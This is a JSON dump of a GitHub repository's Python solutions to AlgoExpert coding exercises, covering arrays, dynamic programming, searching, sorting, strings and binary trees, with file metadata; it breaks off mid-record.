"path": "/ArraysCategory/ArrayOfProducts/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(n) space\ndef arrayOfProducts(array):\n result = []\n \n for i in range(len(array)):\n result.append(product(array[0:i] + array[i + 1: len(array)]))\n return result\n \ndef product(array: list) -> int:\n\tprod = 1\n\tfor elem in array:\n\t\tprod *= elem\n\treturn prod"
},
{
"alpha_fraction": 0.5291005373001099,
"alphanum_fraction": 0.5784832239151001,
"avg_line_length": 27.399999618530273,
"blob_id": "9ac097390d6819daffae44943fae53f89cdceec7",
"content_id": "7ffd50a89364a36d719bccc57b8acee566e64dc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 20,
"path": "/DynamicProgramming/MaxSubsetSumNoAdjacent/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# o(n) time | O(1) space\ndef maxSubsetSumNoAdjacent(array):\n if len(array) == 0: return 0\n elif len(array) == 1: return array[0]\n elif len(array) == 2: return max(array[0], array[1])\n before_last_max = array[0]\n last_max = max(array[0], array[1])\n final_max = last_max\n\n \n i = 2\n while i < len(array):\n final_max = max(last_max, before_last_max + array[i])\n before_last_max = last_max\n last_max = final_max\n i +=1\n \n return final_max\narr = [75, 105, 120, 75, 90, 135]\nprint(maxSubsetSumNoAdjacent(arr))"
},
{
"alpha_fraction": 0.6717391014099121,
"alphanum_fraction": 0.686956524848938,
"avg_line_length": 31.928571701049805,
"blob_id": "7166be2763ef72255e65f22748de71181696ab57",
"content_id": "67d7c0708a193ddf75e93c5caa63a6c98984cfa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 460,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 14,
"path": "/Searching/BinarySearch/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(log(n)) time | O(1) space\ndef binarySearch(array, target):\n\treturn searchBinary(array, target, 0, len(array) - 1)\n\t\ndef searchBinary(array: list, target: int, left: int, right: int) -> int:\n\tif left > right: return -1\n\tmid = (left + right) // 2\n\tpotentialElem = array[mid]\n\t\n\tif target == potentialElem:\n\t\treturn mid\n\telif target > potentialElem:\n\t\treturn searchBinary(array, target, mid + 1, right)\n\telse: return searchBinary(array, target, left, mid - 1)"
},
{
"alpha_fraction": 0.6010362505912781,
"alphanum_fraction": 0.6096718311309814,
"avg_line_length": 37.66666793823242,
"blob_id": "a410998f3b10684bec46a6b74af820df1f14d694",
"content_id": "b2a6b8b09424629113d44a9d658cbedc34aaf211",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 579,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 15,
"path": "/Strings/CaesarCipherEncryptor/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef caesarCipherEncryptor(string, key):\n abc = 'abcdefghijklmnopqrstuvwxyz'\n new_string = []\n for i in range(len(string)):\n if abc.index(string[i]) + key > len(abc) - 1:\n how_many_times = (abc.index(string[i]) + key) //len(abc)\n index = (abc.index(string[i]) + key) - how_many_times*len(abc) - 1\n new_string.append(abc[index + 1])\n else: new_string.append(abc[abc.index(string[i]) + key])\n return ''.join(new_string)\n\nstring = 'ovmqkwtujqmfkao'\nkey = 52\nprint(caesarCipherEncryptor(string, key))"
},
{
"alpha_fraction": 0.633281946182251,
"alphanum_fraction": 0.6671802997589111,
"avg_line_length": 29.952381134033203,
"blob_id": "1945ca55f9e36a5f0f514085877b366ba2bd56c7",
"content_id": "5d711b7fb937e058bf8dea8dd20391f307d0a675",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 649,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 21,
"path": "/DynamicProgramming/WaterArea/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def waterArea(heights):\n\tif len(heights) <= 2: return 0\n\tleft_index = 0\n\tright_index = len(heights) - 1\n\tleft_most_height = heights[left_index]\n\tright_most_height = heights[right_index]\n\tsumm = 0\n\twhile left_index < right_index:\n\t\tif heights[left_index] < heights[right_index]:\n\t\t\tleft_index += 1\n\t\t\tleft_most_height = max(left_most_height, heights[left_index])\n\t\t\tsumm += left_most_height - heights[left_index]\n\t\telse:\n\t\t\tright_index -= 1\n\t\t\tright_most_height = max(right_most_height, heights[right_index])\n\t\t\tsumm += right_most_height - heights[right_index]\n\t\t\t\n\treturn summ\n\narr = [0, 8, 0, 0, 5, 0, 0, 10, 0, 0, 1, 1, 0, 3]\nprint(waterArea(arr))"
},
{
"alpha_fraction": 0.5931034684181213,
"alphanum_fraction": 0.617241382598877,
"avg_line_length": 31.25,
"blob_id": "47bc75f0f97d288aa9941672a2312c9411210f7d",
"content_id": "40471fc7f05e073d009d1d787b549605bd225a31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1160,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 36,
"path": "/DynamicProgramming/LongestIncreasingSubsequence/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(n) space\ndef longestIncreasingSubsequence(array):\n lengths = [0 for i in range(len(array))]\n lengths[0] = 1\n\n sequences = [0 for i in range(len(array))]\n sequences[0] = None\n for i in range(1, len(array)):\n getFirstSmallerBeforeNumber(i, array, lengths, sequences)\n result = buildSequence(lengths, sequences, array)\n result.reverse()\n return result\n \ndef getFirstSmallerBeforeNumber(index, array, lengths, sequences):\n found = False\n for i in range(0, index):\n if array[i] < array[index]:\n if lengths[index] < lengths[i] + 1:\n lengths[index] = lengths[i] + 1\n sequences[index] = i\n found = True\n if not found:\n lengths[index] = 1\n sequences[index] = None\n\ndef buildSequence(lengths, sequences, array):\n result = []\n startingIndex = lengths.index(max(lengths))\n while startingIndex != None:\n result.append(array[startingIndex])\n tmp = startingIndex\n startingIndex = sequences[tmp]\n return result\n\narray = [5, 7, -24, 12, 10, 2, 3, 2, 12, 5, 6, 35]\nprint(longestIncreasingSubsequence(array))"
},
{
"alpha_fraction": 0.44736841320991516,
"alphanum_fraction": 0.4736842215061188,
"avg_line_length": 20.785715103149414,
"blob_id": "0d2f500652a8187d00eadca515f683436f58a269",
"content_id": "1680b2b1b458b1ed52c101b63d1bbd983539f9cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 14,
"path": "/Recursion/NthFibonacci/my_solution_2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef getNthFib(n):\n first = 0\n second = 1\n number = 0\n if n == 1: return first\n elif n == 2: return second\n else:\n while n > 2:\n number = first + second\n first = second\n second = number\n n -= 1\n return number"
},
{
"alpha_fraction": 0.518430233001709,
"alphanum_fraction": 0.563234806060791,
"avg_line_length": 46.33082580566406,
"blob_id": "46a9a862501ac6e48b6253deeb5d8309a04e2007",
"content_id": "e0a363cff6edd8bbcdc9cf60c6e8ecec4bc365aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6294,
"license_type": "no_license",
"max_line_length": 231,
"num_lines": 133,
"path": "/ArraysCategory/CalendarMatching/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# not passing 1 test...:))))\ndef calendarMatching(calendar1: list, bounds1: list, calendar2: list, bounds2: list, meeting_Duration: int)-> list:\n calendar = []\n i = 0\n j = 0\n last_appended_index = -1\n while i < len(calendar1) and j < len(calendar2):\n print(calendar)\n if len(calendar) == 0:\n start_time = minutes_to_military_time(min(military_time_to_minutes(calendar1[i][0]), military_time_to_minutes(calendar2[j][0])))\n end_time = minutes_to_military_time(max(military_time_to_minutes(calendar1[i][1]), military_time_to_minutes(calendar2[j][1])))\n if military_time_to_minutes(calendar1[0][1]) >= military_time_to_minutes(calendar2[0][0]):\n calendar.append([start_time, end_time])\n last_appended_index += 1\n else:\n calendar.append(calendar1[i])\n calendar.append(calendar2[j])\n last_appended_index += 2\n i += 1\n j += 1\n else:\n start1 = military_time_to_minutes(calendar1[i][0])\n end1 = military_time_to_minutes(calendar1[i][1])\n start2 = military_time_to_minutes(calendar2[j][0])\n end2 = military_time_to_minutes(calendar2[j][1])\n\n prev_end = military_time_to_minutes(calendar[last_appended_index][1])\n prev_start = military_time_to_minutes(calendar[last_appended_index][0])\n\n index_for_check = -1\n\n if start1 <= start2: index_for_check = 0\n else: index_for_check = 1\n\n changed = False\n\n if index_for_check == 0:\n if start1 <= prev_end:\n if start1 < prev_start:\n calendar[last_appended_index][0] = minutes_to_military_time(start1)\n if end1 >= start2:\n calendar[last_appended_index][1] = minutes_to_military_time(max(end1, end2))\n elif end1 >= prev_end:\n calendar[last_appended_index][1] = minutes_to_military_time(end1)\n calendar.append(calendar2[j])\n last_appended_index += 1\n else: \n #calendar[last_appended_index][1] = minutes_to_military_time(end1)\n calendar.append(calendar2[j])\n last_appended_index += 1\n changed = True\n else:\n if start2 <= prev_end:\n if start2 < prev_start:\n calendar[last_appended_index][0] = minutes_to_military_time(start2)\n if end2 >= start1:\n calendar[last_appended_index][1] = minutes_to_military_time(max(end1, end2))\n elif end2 >= prev_end:\n calendar[last_appended_index][1] = minutes_to_military_time(end2)\n calendar.append(calendar1[i])\n last_appended_index += 1\n else: \n #calendar[last_appended_index][1] = minutes_to_military_time(end2)\n calendar.append(calendar1[i])\n last_appended_index += 1\n changed = True\n\n if not changed:\n start_time = minutes_to_military_time(min(military_time_to_minutes(calendar1[i][0]), military_time_to_minutes(calendar2[j][0])))\n end_time = minutes_to_military_time(max(military_time_to_minutes(calendar1[i][1]), military_time_to_minutes(calendar2[j][1])))\n calendar.append([start_time, end_time])\n last_appended_index += 1\n\n i += 1\n j += 1\n\n for index in range(i, len(calendar1)):\n if military_time_to_minutes(calendar[last_appended_index][1]) >= military_time_to_minutes(calendar1[index][1]):\n continue\n calendar.append(calendar1[index])\n for index in range(j, len(calendar2)):\n if military_time_to_minutes(calendar[last_appended_index][1]) >= military_time_to_minutes(calendar2[index][1]):\n continue\n calendar.append(calendar2[index])\n\n if len(calendar1) != 0 and len(calendar2) != 0:\n free_start = minutes_to_military_time(max(military_time_to_minutes(bounds1[0]), military_time_to_minutes(bounds2[0])))\n free_end = minutes_to_military_time(min(military_time_to_minutes(bounds1[1]), military_time_to_minutes(bounds2[1])))\n free_bounds = [free_start, free_end]\n\n free_intervalls = []\n 
if military_time_to_minutes(calendar[0][0]) - military_time_to_minutes(free_bounds[0]) >= meeting_Duration:\n free_intervalls.append([free_bounds[0], calendar[0][0]])\n\n for i in range(len(calendar) - 1):\n if military_time_to_minutes(calendar[i + 1][0]) - military_time_to_minutes(calendar[i][1]) >= meeting_Duration:\n free_intervalls.append([calendar[i][1], calendar[i + 1][0]])\n\n if military_time_to_minutes(free_bounds[1]) - military_time_to_minutes(calendar[len(calendar) - 1][1]) >= meeting_Duration:\n free_intervalls.append([calendar[len(calendar) - 1][1], free_bounds[1]])\n\n else:\n return [[minutes_to_military_time(max(military_time_to_minutes(bounds1[0]), military_time_to_minutes(bounds2[0]))), minutes_to_military_time(min(military_time_to_minutes(bounds1[1]), military_time_to_minutes(bounds2[1])))]]\n\n\n return free_intervalls\n \n\ndef military_time_to_minutes(time: str)-> int:\n hour, minute = time.split(':')\n return int(hour) * 60 + int(minute)\ndef minutes_to_military_time(minutes: int)-> str:\n hour = int(minutes / 60)\n minute = minutes % 60\n string_min = str(minute)\n if str(minute) == '0':\n string_min = '00'\n\n return str(hour) + ':' + string_min\n\ncalendar2 = [\n [\"9:00\", \"10:00\"],[\"11:15\", \"11:30\"],[\"11:45\", \"17:00\"],[\"17:30\", \"19:00\"],[\"20:00\", \"22:15\"]\n ]\ncalendar1 = [\n [\"7:00\", \"7:45\"],[\"8:15\", \"8:30\"],[\"9:00\", \"10:30\"],[\"12:00\", \"14:00\"],[\"14:00\", \"15:00\"],[\"15:15\", \"15:30\"],[\"16:30\", \"18:30\"],[\"20:00\", \"21:00\"]\n ]\nbounds1 = [\"6:30\", \"22:00\"]\n\nbounds2 = [\"8:00\", \"22:30\"]\nmeeting_Duration = 30\n\nprint(calendarMatching(calendar1, bounds1, calendar2, bounds2, meeting_Duration))\n#print(military_time_to_minutes(\"10:30\"))"
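\n# hand-checked for the sample above: [['8:30', '9:00'], ['10:30', '11:15'], ['19:00', '20:00']]\n"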
},
{
"alpha_fraction": 0.5348148345947266,
"alphanum_fraction": 0.5496296286582947,
"avg_line_length": 25,
"blob_id": "c248e77f2b4fd90709880306a844f590cc34481e",
"content_id": "5bf4e62a340e210c1100dd94bedf3fc3c75753d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 675,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 26,
"path": "/Strings/RunLengthEncoding/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef runLengthEncoding(string):\n result = ''\n index = 0\n while index < len(string):\n res, string = runLength(index, string)\n result += res\n return result\n\n\t\t\ndef runLength(index: int, string: str):\n counter = 1\n elem = string[index]\n reso = ''\n while index < len(string) - 1 and counter < 9:\n if string[index + 1] == elem:\n counter += 1\n index += 1\n else:\n index += 1\n reso += str(counter) + elem\n return reso, string[index:]\n reso += str(counter) + elem\n return reso, string[index + 1:]\n\nprint(runLengthEncoding('AAAAAAAAAAAAABBCCCCDD'))"
},
{
"alpha_fraction": 0.545064389705658,
"alphanum_fraction": 0.5665236115455627,
"avg_line_length": 32.42856979370117,
"blob_id": "2f78f4a4359c35341ba249ec44590a068453bddf",
"content_id": "5bae16ef0545f799ea82446b07982067e03cbdbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 7,
"path": "/ArraysCategory/TwoNumberSum/solution_3.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(1) space\ndef twoNumberSum(array, targetSum):\n for i in range(0, len(array) - 1):\n\t for j in range(i + 1, len(array)):\n\t\t if array[i] + array[j] == targetSum:\n\t\t\t return [array[i], array[j]]\n return []"
},
{
"alpha_fraction": 0.46853145956993103,
"alphanum_fraction": 0.47902098298072815,
"avg_line_length": 27.700000762939453,
"blob_id": "123812770b802a898fadfd42615bc51a980e9fce",
"content_id": "02a7b1090bdd71b8e67fccd9e683cf9f89f550fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 286,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 10,
"path": "/Sorting/BubbleSort/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "#O(n^2) time | O(1) space\nimport math\ndef bubbleSort(array):\n for i in range(len(array)):\n for j in range(i + 1, len(array)):\n if array[i] > array[j]:\n tmp = array[i]\n array[i] = array[j]\n array[j] = tmp\n return array"
},
{
"alpha_fraction": 0.4696485698223114,
"alphanum_fraction": 0.49520766735076904,
"avg_line_length": 30.399999618530273,
"blob_id": "122032290d929b56e6bc59b03437f70e36125a74",
"content_id": "d2c5d3b5cd7b666b0a90e4a8df9f73ffbc6f1094",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 313,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/DynamicProgramming/NumberOfWaysToMakeChange/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nm) time | O(n) space where m = length(denoms)\ndef numberOfWaysToMakeChange(n, denoms):\n ways = [0 for i in range(0, n + 1)]\n ways[0] = 1\n for denom in denoms:\n for i in range(0, n + 1):\n if denom <= i:\n ways[i] += ways[i - denom]\n \n return ways[-1]"
},
{
"alpha_fraction": 0.4838709533214569,
"alphanum_fraction": 0.5139784812927246,
"avg_line_length": 34.80769348144531,
"blob_id": "a97cd61e24a03c6c6c479fa39fab20f6e3368f69",
"content_id": "0cf2703bfee6b1217d5274583aacb9d98e624f91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 930,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 26,
"path": "/DynamicProgramming/KnapsackProblem/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(capacity*len(items)) time | O(capacity) space\nimport copy\ndef knapsackProblem(items, capacity):\n weights = [elem[1] for elem in items]\n values = [elem[0] for elem in items]\n prev_caps = [[0, []] for i in range(capacity + 1)]\n curr_caps = [[0, []] for i in range(capacity + 1)]\n\n for i in range(len(weights)):\n for j in range(len(curr_caps)):\n if weights[i] <= j:\n if values[i] + prev_caps[j - weights[i]][0] >= prev_caps[j][0]:\n curr_caps[j][0] = values[i] + prev_caps[j - weights[i]][0]\n curr_caps[j][1] = list([i] + prev_caps[j - weights[i]][1])\n else:\n curr_caps[j][0] = prev_caps[j][0]\n curr_caps[j][1] = prev_caps[j][1][0:]\n prev_caps = copy.deepcopy(curr_caps)\n\n return curr_caps[-1]\n\n\nitems = [[1, 2], [4, 3], [5, 6], [6, 7]]\ncap = 10\n\nprint(knapsackProblem(items, cap))"
},
{
"alpha_fraction": 0.4367816150188446,
"alphanum_fraction": 0.4572158455848694,
"avg_line_length": 30.31999969482422,
"blob_id": "676d7e6fcde11a6b03282b6dc0a5c5a6e813a532",
"content_id": "b1ff36dd9e467037f9edcca0eae4b73bf6300630",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 783,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 25,
"path": "/ArraysCategory/FourNumberSum/my_solution2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^3) time | O(n) space\ndef fourNumberSum(array, targetSum):\n result_list = []\n array.sort()\n for i in range(len(array)):\n for j in range(i + 1, len(array)):\n left = j + 1\n right = len(array) - 1\n while left < right:\n if array[i] + array[j] + array[left] + array[right] == targetSum:\n result_list.append([array[i], array[j], array[left], array[right]])\n left += 1\n right -= 1\n elif array[i] + array[j] + array[left] + array[right] < targetSum:\n left += 1\n else:\n right -= 1\n \n return result_list\n\n\narr = [7, 6, 4, -1, 1, 2]\ntargSum = 16\n\nprint(fourNumberSum(arr, targSum))\n"
},
{
"alpha_fraction": 0.5187320113182068,
"alphanum_fraction": 0.5648415088653564,
"avg_line_length": 30.636363983154297,
"blob_id": "cbbe19b59402ae61bf35714be834cec82db16dbb",
"content_id": "ed785baf8b0e79c16afb98605bddaf4fed8a7d63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 347,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/Recursion/ProductSum/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(d) space where d is the greatest depth\ndef productSum(array, depth=1, idx=0):\n result = 0\n for elem in array:\n if type(elem) is list:\n result += (depth + 1) * productSum(elem, depth + 1, 0)\n else: result += elem\n return result\narray = [5, 2, [7, -1], 3, [6, [-13, 8], 4]]\n\nprint(productSum(array))"
},
{
"alpha_fraction": 0.5654362440109253,
"alphanum_fraction": 0.5788590312004089,
"avg_line_length": 30.421052932739258,
"blob_id": "5c9f770af1b490face506c6b6a18bb15576c045a",
"content_id": "31553c2b83e2222164f128a80a968fdf4b09a78a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 596,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 19,
"path": "/ArraysCategory/ThreeNumberSum/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(n) space\ndef threeNumberSum(array, targetSum):\n result_triplets = []\n array.sort()\n for index in range(len(array) - 2):\n\t left = index + 1\n\t right = len(array) - 1\n\t\t\n\t while left < right:\n\t\t if array[index] + array[left] + array[right] == targetSum:\n\t\t\t result_triplets.append([array[index], array[left], array[right]])\n\t\t\t left += 1\n\t\t\t right -= 1\n\t\t elif array[index] + array[left] + array[right] < targetSum:\n\t\t\t left += 1\n\t\t elif array[index] + array[left] + array[right] > targetSum:\n\t\t\t right -= 1\n\t\t\t\t\n return result_triplets"
},
{
"alpha_fraction": 0.5260416865348816,
"alphanum_fraction": 0.5703125,
"avg_line_length": 26.5,
"blob_id": "0c9359c322de8f0012bce626928a822b0c95ec09",
"content_id": "eac98ac2dab087577c3fa059d50337e2f705d84c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 14,
"path": "/Greedy/MinimumWaitingTime/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def minimumWaitingTime(queries):\n if len(queries) == 1:\n return queries[0]\n queries.sort()\n biggest = queries[-1]\n for i in range(len(queries) - 1, 0, -1):\n queries[i] = queries[i - 1]\n queries[0] = biggest\n summ = 0\n for i in range(1, len(queries)):\n summ += sum(queries[1: i + 1])\n return summ\n\nprint(minimumWaitingTime([3, 2, 1, 2, 6]))"
},
{
"alpha_fraction": 0.4739638566970825,
"alphanum_fraction": 0.4877789616584778,
"avg_line_length": 26.676469802856445,
"blob_id": "7971890e108ca94421e02910aeb02ac15f077b2b",
"content_id": "860c719e0801978cfb71a11529a48b4927474206",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 941,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 34,
"path": "/ArraysCategory/LargestRange/my_solution2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef largestRange(array):\n elements = {}\n for elem in array:\n elements[elem] = True\n \n result_range = []\n tmp_range = []\n \n for elem in array:\n if elem not in result_range:\n left_range = []\n middle_range = [elem]\n right_range = []\n tmp_elem = elem\n while tmp_elem - 1 in elements:\n left_range.append(tmp_elem - 1)\n tmp_elem = tmp_elem - 1\n tmp_elem = elem\n while tmp_elem + 1 in elements:\n right_range.append(tmp_elem + 1)\n tmp_elem = tmp_elem + 1\n\n tmp_range = left_range + middle_range + right_range\n tmp_range.sort()\n\n if len(tmp_range) > len(result_range):\n result_range = tmp_range[0:]\n \n return [result_range[0], result_range[-1]]\n\narr = [4, 2, 1, 3]\n\nprint(largestRange(arr))\n"
},
{
"alpha_fraction": 0.50352942943573,
"alphanum_fraction": 0.5364705920219421,
"avg_line_length": 24.058822631835938,
"blob_id": "932e76a61dc44b47d1d6bf62f0d10682696d7bf7",
"content_id": "9a43dc693c2028b337e96d7fa40035a69f324744",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 17,
"path": "/ArraysCategory/MinRewards/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef minRewards(scores):\n rewards = [1 for i in range(len(scores))]\n\n for i in range(1, len(scores)):\n if scores[i] > scores[i - 1]:\n rewards[i] = rewards[i - 1] + 1\n\n for i in reversed(range(len(scores) - 1)):\n if scores[i] > scores[i + 1]:\n rewards[i] = max(rewards[i], rewards[i + 1] + 1)\n\n return sum(rewards)\n\narr = [0, 4, 2, 1, 3]\n\nminRewards(arr)"
},
{
"alpha_fraction": 0.5677530169487,
"alphanum_fraction": 0.5774728655815125,
"avg_line_length": 34,
"blob_id": "2e73b398f7e3b052edd25e5528cfa5a8a2faafa6",
"content_id": "e0b0c62d97324c39781d5678d0696c443e817133",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1749,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 50,
"path": "/ArraysCategory/ApartmentHunting/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(ba) time | O(ba) where b = number of block and a = number of attributes\ndef apartmentHunting(blocks, reqs):\n building_distances = []\n for req in reqs:\n building_distances.append(get_distances_for_req(req, blocks))\n\n best_block_area = -1\n min_distance = float('inf')\n for index in range(len(blocks)):\n max_distance = -1\n for building in building_distances:\n max_distance = max(max_distance, building[index])\n if max_distance < min_distance:\n min_distance = max_distance\n best_block_area = index\n\n return best_block_area\n\n\n\ndef get_distances_for_req(req, blocks):\n distances = [float('inf') for i in range(len(blocks))]\n\n for index, block in enumerate(blocks, 0):\n if block[req]:\n distances[index] = 0\n else:\n if index - 1 >= 0:\n if distances[index - 1] != float('inf'):\n distances[index] = distances[index - 1] + 1\n\n for index in range(len(distances) - 2, -1, -1):\n if distances[index] != float('inf') and distances[index + 1] < distances[index]:\n distances[index] = distances[index + 1] + 1\n elif distances[index] == float('inf'):\n distances[index] = distances[index + 1] + 1\n \n return distances\n\nblocks = [\n {\"gym\": False, \"office\": True, \"school\": True, \"store\": False},\n {\"gym\": True, \"office\": False, \"school\": False, \"store\": False},\n {\"gym\": True, \"office\": False, \"school\": True, \"store\": False},\n {\"gym\": False, \"office\": False, \"school\": True, \"store\": False},\n {\"gym\": False, \"office\": False, \"school\": True, \"store\": True}\n ]\nreqs = [\"gym\", \"office\", \"school\", \"store\"]\n\n\nprint(apartmentHunting(blocks, reqs))"
},
{
"alpha_fraction": 0.6193895936012268,
"alphanum_fraction": 0.6211849451065063,
"avg_line_length": 23.2608699798584,
"blob_id": "c7605cbb209a4aa7f2120a7e26b5714f01c6a68b",
"content_id": "3f3c3cfb84c9ea4e973f938967d97cc4d01c905d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 557,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 23,
"path": "/BinaryTrees/BranchSums/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# This is the class of the input root. Do not edit it.\nclass BinaryTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n\ndef branchSums(root) -> list:\n sums = []\n calculateSum(root, 0, sums)\n return sums\n\ndef calculateSum(root, currSum: float, sums: list):\n if root == None:\n return\n\n currSum += root.value\n if root.left == None and root.right == None:\n sums.append(currSum)\n\n calculateSum(root.left, currSum, sums)\n calculateSum(root.right, currSum, sums)"
},
{
"alpha_fraction": 0.6476964950561523,
"alphanum_fraction": 0.6612465977668762,
"avg_line_length": 23.66666603088379,
"blob_id": "315d0c17c593c3dfbb608d983f82f7ef630101d6",
"content_id": "806a15f2cecc6c6b342a399ed6f26fdfe1bb3550",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 369,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 15,
"path": "/ArraysCategory/TwoNumberSum/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nlog(n)) time | O(1) space\ndef twoNumberSum(array, targetSum):\n\tarray.sort()\n\tleft = 0\n\tright = len(array) - 1\n\t\n\twhile array[left] < array[right]:\n\t\tpotentialSum = array[left] + array[right]\n\t\tif potentialSum == targetSum:\n\t\t\treturn [array[left], array[right]]\n\t\telif potentialSum < targetSum:\n\t\t\tleft += 1\n\t\telif potentialSum > targetSum:\n\t\t\tright -= 1\n\treturn []"
},
{
"alpha_fraction": 0.45501023530960083,
"alphanum_fraction": 0.49284252524375916,
"avg_line_length": 36.653846740722656,
"blob_id": "7c439b9e7d023d8c0d9974ac4cd54e81dd11e963",
"content_id": "e67d983e98f33a9869c466114b7c7f0c78ed33ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 978,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 26,
"path": "/DynamicProgramming/MinNumberOfJumps/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef minNumberOfJumps(array):\n number_of_jumps = 0\n i = 0\n while i < len(array) - 1:\n if array[i] + i >= len(array) - 1:\n return number_of_jumps + 1\n possible_elems = array[i + 1: i + array[i] + 1]\n step_sum = i + array[i]\n index_to_step = i + array[i]\n for j in range(len(possible_elems)):\n if possible_elems[j] + (i + j + 2 - (i + 1)) >= len(array) - (i + 1):\n return number_of_jumps + 2\n if i + 1 + possible_elems[j] > len(array) - 1:\n return number_of_jumps + 2\n if possible_elems[j] + array[i + 1 + possible_elems[j]] > step_sum:\n step_sum = possible_elems[j] + array[i + 1 + possible_elems[j]]\n index_to_step = i + (j + 1)\n i = index_to_step\n number_of_jumps += 1\n return number_of_jumps\n\n\n\narr = [3, 10, 2, 1, 2, 3, 7, 1, 1, 1, 3, 2, 3, 2, 1, 1, 1, 1]\nprint(minNumberOfJumps(arr))"
},
{
"alpha_fraction": 0.5439330339431763,
"alphanum_fraction": 0.5564853549003601,
"avg_line_length": 20.727272033691406,
"blob_id": "acfbe3d456e9315dde82e270cb6d8092c7c98266",
